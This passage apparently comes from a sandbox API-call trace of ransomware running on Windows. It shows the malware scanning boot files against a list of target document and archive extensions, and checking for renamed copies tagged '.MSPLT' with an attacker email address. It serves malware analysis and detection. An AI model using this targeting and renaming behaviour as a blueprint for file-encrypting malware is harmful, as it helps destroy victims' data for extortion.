[0314.106] GetTickCount () returned 0x1147783 [0314.106] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0314.450] GetTickCount () returned 0x11478db [0314.450] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0315.027] GetTickCount () returned 0x1147b1d [0315.027] GetTickCount () returned 0x1147b1d [0315.027] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0315.205] GetTickCount () returned 0x1147bc9 [0315.205] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0315.335] GetTickCount () returned 0x1147c46 [0315.335] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0315.528] GetTickCount () returned 0x1147d11 [0315.528] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0315.695] GetTickCount () returned 0x1147dad [0315.695] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0315.948] GetTickCount () returned 0x1147eb7 [0315.949] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0316.342] GetTickCount () returned 0x114803d [0316.346] GetTickCount () returned 0x114803d [0316.346] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0316.575] GetTickCount () returned 0x1148128 [0316.575] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0316.860] GetTickCount () returned 0x1148241 [0316.860] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0317.094] GetTickCount () returned 0x114832b [0317.094] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0317.285] GetTickCount () returned 0x11483e7 [0317.285] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0317.498] GetTickCount () returned 0x11484c1 [0317.498] GetTickCount () returned 0x11484c1 [0317.498] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0317.920] GetTickCount () returned 0x1148667 [0317.920] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0318.184] GetTickCount () returned 0x1148771 [0318.184] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0318.421] GetTickCount () returned 0x114885b [0318.421] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0318.890] GetTickCount () returned 0x1148a40 [0318.890] GetTickCount () returned 0x1148a40 [0318.890] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0319.182] GetTickCount () returned 0x1148b59 [0319.182] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0319.863] GetTickCount () returned 0x1148e08 [0319.863] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0320.248] GetTickCount () returned 0x1148f7f [0320.248] GetTickCount () returned 0x1148f7f [0320.248] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0320.403] GetTickCount () returned 0x114901c [0320.403] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0320.672] GetTickCount () returned 0x1149125 [0320.672] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) returned 0x102 [0321.671] GetTickCount () returned 0x114950d [0321.671] GetTickCount () returned 0x114950d [0321.671] WaitForSingleObject (hHandle=0x314, dwMilliseconds=0x64) Thread: id = 44 os_tid = 0xe0c Thread: id = 46 os_tid = 0xe18 [0283.155] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x38d32e0 [0283.155] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10000) returned 0x38e32e8 [0283.156] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc4b0 [0283.156] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x6) returned 0x50b588 [0283.156] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc420 [0283.156] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x100000) returned 0x3ca8020 [0283.159] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc4c8 [0283.159] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc4c8, Size=0x20) returned 0x4ade30 [0283.159] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x10) returned 0x4cc528 [0283.159] RtlReAllocateHeap (Heap=0x470000, Flags=0x0, Ptr=0x4cc528, Size=0x20) returned 0x4ae010 [0283.160] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x77a50000 [0283.160] GetProcAddress (hModule=0x77a50000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x77a66b30 [0283.160] Wow64DisableWow64FsRedirection (in: OldValue=0x335ff50 | out: OldValue=0x335ff50*=0x0) returned 1 [0283.160] lstrlenW (lpString="kernel32.dll") returned 12 [0283.160] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ade30 | out: hHeap=0x470000) returned 1 [0283.160] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0283.160] HeapFree (in: hHeap=0x470000, dwFlags=0x0, lpMem=0x4ae010 | out: hHeap=0x470000) returned 1 [0283.160] Sleep (dwMilliseconds=0x64) [0283.505] Sleep (dwMilliseconds=0x64) [0283.792] Sleep (dwMilliseconds=0x64) [0284.038] Sleep (dwMilliseconds=0x64) [0284.327] Sleep (dwMilliseconds=0x64) [0284.481] lstrlenW (lpString="BCD") returned 3 [0284.481] CreateFileW (lpFileName="C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0284.481] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0284.481] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0284.481] lstrlenW (lpString=".doc") returned 4 [0284.481] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0284.481] lstrlenW (lpString=".docx") returned 5 [0284.481] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0284.481] lstrlenW (lpString=".pdf") returned 4 [0284.481] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0284.481] lstrlenW (lpString=".xls") returned 4 [0284.481] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0284.481] lstrlenW (lpString=".xlsx") returned 5 [0284.481] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0284.481] lstrlenW (lpString=".ppt") returned 4 [0284.481] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0284.481] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0284.481] lstrlenW (lpString=".zip") returned 4 [0284.481] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0284.481] lstrlenW (lpString=".rar") returned 4 [0284.481] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0284.481] lstrlenW (lpString=".bz2") returned 4 [0284.481] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0284.481] lstrlenW (lpString=".7z") returned 3 [0284.482] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0284.482] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0284.482] lstrlenW (lpString=".dbf") returned 4 [0284.482] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0284.482] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0284.482] lstrlenW (lpString=".1cd") returned 4 [0284.482] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0284.482] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0284.482] lstrlenW (lpString=".jpg") returned 4 [0284.482] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0284.482] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0284.482] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0284.482] lstrlenW (lpString=".doc") returned 4 [0284.482] lstrcmpiW (lpString1=".doc", lpString2="\\BCD") returned -1 [0284.482] lstrlenW (lpString=".docx") returned 5 [0284.482] lstrcmpiW (lpString1=".docx", lpString2="t\\BCD") returned -1 [0284.482] lstrlenW (lpString=".pdf") returned 4 [0284.482] lstrcmpiW (lpString1=".pdf", lpString2="\\BCD") returned -1 [0284.482] lstrlenW (lpString=".xls") returned 4 [0284.482] lstrcmpiW (lpString1=".xls", lpString2="\\BCD") returned -1 [0284.482] lstrlenW (lpString=".xlsx") returned 5 [0284.482] lstrcmpiW (lpString1=".xlsx", lpString2="t\\BCD") returned -1 [0284.482] lstrlenW (lpString=".ppt") returned 4 [0284.482] lstrcmpiW (lpString1=".ppt", lpString2="\\BCD") returned -1 [0284.482] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0284.482] lstrlenW (lpString=".zip") returned 4 [0284.482] lstrcmpiW (lpString1=".zip", lpString2="\\BCD") returned -1 [0284.482] lstrlenW (lpString=".rar") returned 4 [0284.482] lstrcmpiW (lpString1=".rar", lpString2="\\BCD") returned -1 [0284.482] lstrlenW (lpString=".bz2") returned 4 [0284.482] lstrcmpiW (lpString1=".bz2", lpString2="\\BCD") returned -1 [0284.482] lstrlenW (lpString=".7z") returned 3 [0284.482] lstrcmpiW (lpString1=".7z", lpString2="BCD") returned -1 [0284.483] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0284.483] lstrlenW (lpString=".dbf") returned 4 [0284.483] lstrcmpiW (lpString1=".dbf", lpString2="\\BCD") returned -1 [0284.483] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0284.483] lstrlenW (lpString=".1cd") returned 4 [0284.483] lstrcmpiW (lpString1=".1cd", lpString2="\\BCD") returned -1 [0284.483] lstrlenW (lpString="C:\\Boot\\BCD") returned 11 [0284.483] lstrlenW (lpString=".jpg") returned 4 [0284.483] lstrcmpiW (lpString1=".jpg", lpString2="\\BCD") returned -1 [0284.483] lstrcmpiW (lpString1=".LOG1", lpString2=".MSPLT") returned -1 [0284.483] lstrlenW (lpString="BCD.LOG1") returned 8 [0284.483] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0284.484] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=0) returned 1 [0284.484] CloseHandle (hObject=0x33c) returned 1 [0284.484] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0284.484] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0284.484] lstrlenW (lpString=".doc") returned 4 [0284.484] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0284.484] lstrlenW (lpString=".docx") returned 5 [0284.484] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0284.484] lstrlenW (lpString=".pdf") returned 4 [0284.484] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0284.484] lstrlenW (lpString=".xls") returned 4 [0284.484] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0284.484] lstrlenW (lpString=".xlsx") returned 5 [0284.484] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0284.485] lstrlenW (lpString=".ppt") returned 4 [0284.485] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0284.485] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0284.485] lstrlenW (lpString=".zip") returned 4 [0284.485] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0284.485] lstrlenW (lpString=".rar") returned 4 [0284.485] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0284.485] lstrlenW (lpString=".bz2") returned 4 [0284.485] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0284.485] lstrlenW (lpString=".7z") returned 3 [0284.485] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0284.485] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0284.485] lstrlenW (lpString=".dbf") returned 4 [0284.485] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0284.485] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0284.485] lstrlenW (lpString=".1cd") returned 4 [0284.485] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0284.485] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0284.485] lstrlenW (lpString=".jpg") returned 4 [0284.485] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0284.485] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0284.485] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0284.485] lstrlenW (lpString=".doc") returned 4 [0284.485] lstrcmpiW (lpString1=".doc", lpString2="LOG1") returned -1 [0284.485] lstrlenW (lpString=".docx") returned 5 [0284.485] lstrcmpiW (lpString1=".docx", lpString2=".LOG1") returned -1 [0284.485] lstrlenW (lpString=".pdf") returned 4 [0284.485] lstrcmpiW (lpString1=".pdf", lpString2="LOG1") returned -1 [0284.486] lstrlenW (lpString=".xls") returned 4 [0284.486] lstrcmpiW (lpString1=".xls", lpString2="LOG1") returned -1 [0284.486] lstrlenW (lpString=".xlsx") returned 5 [0284.486] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG1") returned 1 [0284.486] lstrlenW (lpString=".ppt") returned 4 [0284.486] lstrcmpiW (lpString1=".ppt", lpString2="LOG1") returned -1 [0284.486] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0284.486] lstrlenW (lpString=".zip") returned 4 [0284.486] lstrcmpiW (lpString1=".zip", lpString2="LOG1") returned -1 [0284.486] lstrlenW (lpString=".rar") returned 4 [0284.486] lstrcmpiW (lpString1=".rar", lpString2="LOG1") returned -1 [0284.486] lstrlenW (lpString=".bz2") returned 4 [0284.486] lstrcmpiW (lpString1=".bz2", lpString2="LOG1") returned -1 [0284.486] lstrlenW (lpString=".7z") returned 3 [0284.486] lstrcmpiW (lpString1=".7z", lpString2="OG1") returned -1 [0284.486] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0284.486] lstrlenW (lpString=".dbf") returned 4 [0284.486] lstrcmpiW (lpString1=".dbf", lpString2="LOG1") returned -1 [0284.486] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0284.486] lstrlenW (lpString=".1cd") returned 4 [0284.486] lstrcmpiW (lpString1=".1cd", lpString2="LOG1") returned -1 [0284.486] lstrlenW (lpString="C:\\Boot\\BCD.LOG1") returned 16 [0284.486] lstrlenW (lpString=".jpg") returned 4 [0284.486] lstrcmpiW (lpString1=".jpg", lpString2="LOG1") returned -1 [0284.486] lstrcmpiW (lpString1=".LOG2", lpString2=".MSPLT") returned -1 [0284.486] lstrlenW (lpString="BCD.LOG2") returned 8 [0284.486] CreateFileW (lpFileName="C:\\Boot\\BCD.LOG2" (normalized: "c:\\boot\\bcd.log2"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x33c [0284.487] GetFileSizeEx (in: hFile=0x33c, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=0) returned 1 [0284.487] CloseHandle (hObject=0x33c) returned 1 [0284.487] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0284.487] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0284.487] lstrlenW (lpString=".doc") returned 4 [0284.487] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0284.487] lstrlenW (lpString=".docx") returned 5 [0284.487] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0284.487] lstrlenW (lpString=".pdf") returned 4 [0284.487] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0284.487] lstrlenW (lpString=".xls") returned 4 [0284.487] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0284.487] lstrlenW (lpString=".xlsx") returned 5 [0284.487] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0284.487] lstrlenW (lpString=".ppt") returned 4 [0284.487] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0284.487] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0284.487] lstrlenW (lpString=".zip") returned 4 [0284.487] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0284.487] lstrlenW (lpString=".rar") returned 4 [0284.487] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0284.487] lstrlenW (lpString=".bz2") returned 4 [0284.487] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0284.487] lstrlenW (lpString=".7z") returned 3 [0284.487] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0284.487] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0284.488] lstrlenW (lpString=".dbf") returned 4 [0284.488] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0284.488] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0284.488] lstrlenW (lpString=".1cd") returned 4 [0284.488] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0284.488] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0284.488] lstrlenW (lpString=".jpg") returned 4 [0284.488] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0284.488] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0284.488] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0284.488] lstrlenW (lpString=".doc") returned 4 [0284.488] lstrcmpiW (lpString1=".doc", lpString2="LOG2") returned -1 [0284.488] lstrlenW (lpString=".docx") returned 5 [0284.488] lstrcmpiW (lpString1=".docx", lpString2=".LOG2") returned -1 [0284.488] lstrlenW (lpString=".pdf") returned 4 [0284.488] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0284.488] lstrlenW (lpString=".xls") returned 4 [0284.488] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0284.488] lstrlenW (lpString=".xlsx") returned 5 [0284.488] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0284.488] lstrlenW (lpString=".ppt") returned 4 [0284.488] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0284.488] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0284.488] lstrlenW (lpString=".zip") returned 4 [0284.488] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0284.488] lstrlenW (lpString=".rar") returned 4 [0284.488] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0284.488] lstrlenW (lpString=".bz2") returned 4 [0284.488] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0284.488] lstrlenW (lpString=".7z") returned 3 [0284.488] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0284.488] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0284.489] lstrlenW (lpString=".dbf") returned 4 [0284.489] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0284.489] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0284.489] lstrlenW (lpString=".1cd") returned 4 [0284.489] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0284.489] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0284.489] lstrlenW (lpString=".jpg") returned 4 [0284.489] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0284.489] Sleep (dwMilliseconds=0x64) [0284.824] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0284.824] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0284.824] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0284.826] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=75616) returned 1 [0284.826] CloseHandle (hObject=0x390) returned 1 [0284.826] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0284.826] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0284.826] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0284.827] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0284.827] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0284.827] lstrlenW (lpString=".doc") returned 4 [0284.827] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0284.827] lstrlenW (lpString=".docx") returned 5 [0284.827] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0284.827] lstrlenW (lpString=".pdf") returned 4 [0284.827] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0284.827] lstrlenW (lpString=".xls") returned 4 [0284.827] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0284.827] lstrlenW (lpString=".xlsx") returned 5 [0284.827] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0284.827] lstrlenW (lpString=".ppt") returned 4 [0284.827] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0284.827] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0284.827] lstrlenW (lpString=".zip") returned 4 [0284.827] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0284.827] lstrlenW (lpString=".rar") returned 4 [0284.827] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0284.827] lstrlenW (lpString=".bz2") returned 4 [0284.827] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0284.827] lstrlenW (lpString=".7z") returned 3 [0284.827] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0284.828] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0284.828] lstrlenW (lpString=".dbf") returned 4 [0284.828] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0284.828] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0284.828] lstrlenW (lpString=".1cd") returned 4 [0284.828] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0284.828] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0284.828] lstrlenW (lpString=".jpg") returned 4 [0284.829] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0284.829] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0284.829] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0284.829] lstrlenW (lpString=".doc") returned 4 [0284.829] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0284.829] lstrlenW (lpString=".docx") returned 5 [0284.829] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0284.829] lstrlenW (lpString=".pdf") returned 4 [0284.829] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0284.829] lstrlenW (lpString=".xls") returned 4 [0284.829] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0284.830] lstrlenW (lpString=".xlsx") returned 5 [0284.830] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0284.830] lstrlenW (lpString=".ppt") returned 4 [0284.830] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0284.830] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0284.830] lstrlenW (lpString=".zip") returned 4 [0284.830] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0284.830] lstrlenW (lpString=".rar") returned 4 [0284.830] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0284.830] lstrlenW (lpString=".bz2") returned 4 [0284.830] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0284.830] lstrlenW (lpString=".7z") returned 3 [0284.830] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0284.830] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0284.830] lstrlenW (lpString=".dbf") returned 4 [0284.830] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0284.830] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0284.830] lstrlenW (lpString=".1cd") returned 4 [0284.830] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0284.830] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0284.830] lstrlenW (lpString=".jpg") returned 4 [0284.830] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0284.831] lstrcmpiW (lpString1=".mui", lpString2=".MSPLT") returned 1 [0284.831] lstrlenW (lpString="memtest.exe.mui") returned 15 [0284.831] CreateFileW (lpFileName="C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0284.831] GetFileSizeEx (in: hFile=0x390, lpFileSize=0x335ff14 | out: lpFileSize=0x335ff14*=45472) returned 1 [0284.831] CloseHandle (hObject=0x390) returned 1 [0284.831] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui")) returned 0x20 [0284.831] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\memtest.exe.mui.id-B4197730.[supermetasploit@aol.com].MSPLT" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui.id-b4197730.[supermetasploit@aol.com].msplt")) returned 0xffffffff [0284.831] CreateFileW (lpFileName="C:\\Boot\\da-DK\\memtest.exe.mui" (normalized: "c:\\boot\\da-dk\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0284.832] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0284.832] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0284.832] lstrlenW (lpString=".doc") returned 4 [0284.832] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0284.832] lstrlenW (lpString=".docx") returned 5 [0284.832] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0284.832] lstrlenW (lpString=".pdf") returned 4 [0284.832] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0284.832] lstrlenW (lpString=".xls") returned 4 [0284.832] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0284.832] lstrlenW (lpString=".xlsx") returned 5 [0284.832] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0284.832] lstrlenW (lpString=".ppt") returned 4 [0284.832] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0284.832] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0284.832] lstrlenW (lpString=".zip") returned 4 [0284.832] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0284.832] lstrlenW (lpString=".rar") returned 4 [0284.832] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0284.832] lstrlenW (lpString=".bz2") returned 4 [0284.832] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0284.832] lstrlenW (lpString=".7z") returned 3 [0284.832] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0284.832] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0284.832] lstrlenW (lpString=".dbf") returned 4 [0284.833] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0284.833] lstrlenW (lpString="C:\\Boot\\da-DK\\memtest.exe.mui") returned 29 [0284.833] lstrlenW (lpString=".1cd") returned 4 [0284.833] lstrcmpiW (lpString1=".1cd", 